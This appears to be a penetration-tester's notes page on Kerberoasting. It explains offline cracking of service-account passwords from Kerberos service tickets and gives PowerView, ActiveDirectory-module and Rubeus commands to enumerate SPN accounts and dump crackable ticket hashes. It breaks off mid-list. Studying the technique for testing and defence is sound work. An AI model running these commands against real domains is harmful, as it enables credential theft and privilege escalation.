Offline cracking of service account passwords. The encrypted part of a Kerberos service ticket (TGS) is encrypted with a key derived from the password of the service account that owns the requested SPN (for RC4-HMAC, etype 23, that key is simply the account's NT hash). Any authenticated domain user can request such a ticket, so an attacker can take the ticket offline and brute-force the password without ever contacting the service and without causing lockouts. Service accounts are frequently neglected (passwords are rarely rotated and are often chosen by humans) and often hold privileged access. A recovered service account password hash can also be used to forge Silver Tickets for that service.
The attack occurs in step 4: a TGS for the target service is requested (with Rubeus or GetUserSPNs.py), and the encrypted server part of the ticket is extracted and cracked offline to recover the service account's password. The requested TGS is never presented to the application server (no AP-REQ is sent); it is simply saved and cracked.
<aside> ⚠️
The Kerberoasting attack can be conducted without knowing any SPN of the target account, since a service ticket can be requested as long as the target account's SAM account name (sAMAccountName) is known. (swarm.ptsecurity.com)
N.B.: Kerberos can deliver service tickets even if the account has no SPN at all, but then the account's sAMAccountName must end with $, and in that case it is hard to know whether the password was set by a human (names ending in $ are normally computer accounts, whose passwords are long, random and rotated automatically). Kerberoast attacks therefore usually target user accounts with at least one SPN (servicePrincipalName), since those probably have human-chosen passwords (sources: Twitter and [MS-KILE] section 3.3.5.1.1).
</aside>
Find user accounts used as service accounts (user objects with at least one SPN set):
Get-DomainUser -SPN #PowerView
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName #ActiveDirectory module
Use Rubeus to list Kerberoastable users and statistics about them (encryption types, password last set) without requesting tickets (ONLY FROM AN AD-JOINED MACHINE):
.\Rubeus.exe kerberoast
.\Rubeus.exe kerberoast /stats
Use Rubeus to request a TGS for a single account and either print only the crackable hash (/simple) or write it to a file (/outfile):
.\Rubeus.exe kerberoast /user:svctest /simple
.\Rubeus.exe kerberoast /user:svctest /outfile:svctest.txt
Kerberoast all possible accounts: